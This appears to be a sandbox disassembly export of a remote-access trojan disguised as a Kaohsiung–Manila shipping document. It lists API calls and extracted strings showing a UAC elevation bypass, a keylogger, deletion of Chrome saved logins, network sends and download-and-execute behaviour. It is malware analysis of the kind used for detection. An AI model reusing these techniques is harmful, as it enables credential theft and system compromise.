                                                      • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                      • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                      • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                      • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00406788
                                                      • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Object_wcslen
                                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                      • API String ID: 240030777-3166923314
                                                      • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                      • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                      • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                      • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                      APIs
                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                      • GetLastError.KERNEL32 ref: 00419935
                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                      • String ID:
                                                      • API String ID: 3587775597-0
                                                      • Opcode ID: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                      • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                      • Opcode Fuzzy Hash: 46cfc2a1174990e4b59b9ee5729c715e61cf9958b22909a5f2789daa8df81af0
                                                      • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                      APIs
                                                        • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                        • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                        • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                        • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                      • String ID: <D$<D$<D
                                                      • API String ID: 745075371-3495170934
                                                      • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                      • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                      • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                      • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536
                                                        • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                      • String ID:
                                                      • API String ID: 2341273852-0
                                                      • Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                      • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                      • Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
                                                      • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                        • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Find$CreateFirstNext
                                                      • String ID: @CG$XCG$`HG$`HG$>G
                                                      • API String ID: 341183262-3780268858
                                                      • Opcode ID: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                      • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                      • Opcode Fuzzy Hash: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
                                                      • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                      • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                      • GetLastError.KERNEL32 ref: 00409A1B
                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                      • TranslateMessage.USER32(?), ref: 00409A7A
                                                      • DispatchMessageA.USER32(?), ref: 00409A85
                                                      Strings
                                                      • Keylogger initialization failure: error , xrefs: 00409A32
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                      • String ID: Keylogger initialization failure: error
                                                      • API String ID: 3219506041-952744263
                                                      • Opcode ID: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                      • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                      • Opcode Fuzzy Hash: 10065da0f80e2b1588f186909b8751ab17816e81d90ef01b858d99eb9022e310
                                                      • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                        • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                                      • API String ID: 2127411465-314212984
                                                      • Opcode ID: 4bfa0ab92cfe4c7e273a593f9c438f6144fcaff52e32c91ef8c2f101195a9e69
                                                      • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                      • Opcode Fuzzy Hash: 4bfa0ab92cfe4c7e273a593f9c438f6144fcaff52e32c91ef8c2f101195a9e69
                                                      • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                      APIs
                                                        • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                        • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                        • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                      • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                      • ExitProcess.KERNEL32 ref: 0040E672
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                                      • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                      • API String ID: 2281282204-3981147832
                                                      • Opcode ID: e7420bd81adcf7ecaeb63c441a7eb2a496d40f418d65372005f5d4e07d0bafb2
                                                      • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                      • Opcode Fuzzy Hash: e7420bd81adcf7ecaeb63c441a7eb2a496d40f418d65372005f5d4e07d0bafb2
                                                      • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
• GetLastError.KERNEL32 ref: 0040B261
Strings
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
• UserProfile, xrefs: 0040B227
• [Chrome StoredLogins not found], xrefs: 0040B27B
• [Chrome StoredLogins found, cleared!], xrefs: 0040B287
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
• OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
• GetLastError.KERNEL32 ref: 00416B02
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
APIs
• __EH_prolog.LIBCMT ref: 004089AE
  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
• FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
  • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
  • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
• __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
• String ID:
• API String ID: 4043647387-0
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
APIs
  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
• ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
• GetProcAddress.KERNEL32(00000000), ref: 00415977
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: PowrProf.dll$SetSuspendState
• API String ID: 1589313981-1420736420
APIs
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
• GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
APIs
• FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
• LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
• LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
• SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID: SETTINGS
• API String ID: 3473537107-594951305
APIs
• __EH_prolog.LIBCMT ref: 00407A91
• FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: Find$File$CloseFirstH_prologNext
• String ID:
• API String ID: 1157919129-0
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
• WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
• WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
• _free.LIBCMT ref: 00448067
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 00448233
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
Strings
• open, xrefs: 0040622E
• C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, xrefs: 0040627F, 004063A7
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe$open
• API String ID: 2825088817-288794478
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: FileFind$FirstNextsend
• String ID: x@G$x@G
• API String ID: 4113138495-3390264752
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
  • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
  • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
• _wcschr.LIBVCRUNTIME ref: 00450BF1
• _wcschr.LIBVCRUNTIME ref: 00450BFF
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 4212172061-0
APIs
• __EH_prolog.LIBCMT ref: 00408DAC
• FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
• FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: FileFind$FirstH_prologNext
• String ID:
• API String ID: 301083792-0
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
Memory Dump Source
• Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
                                                      • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                      • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                      • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                      • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                      APIs
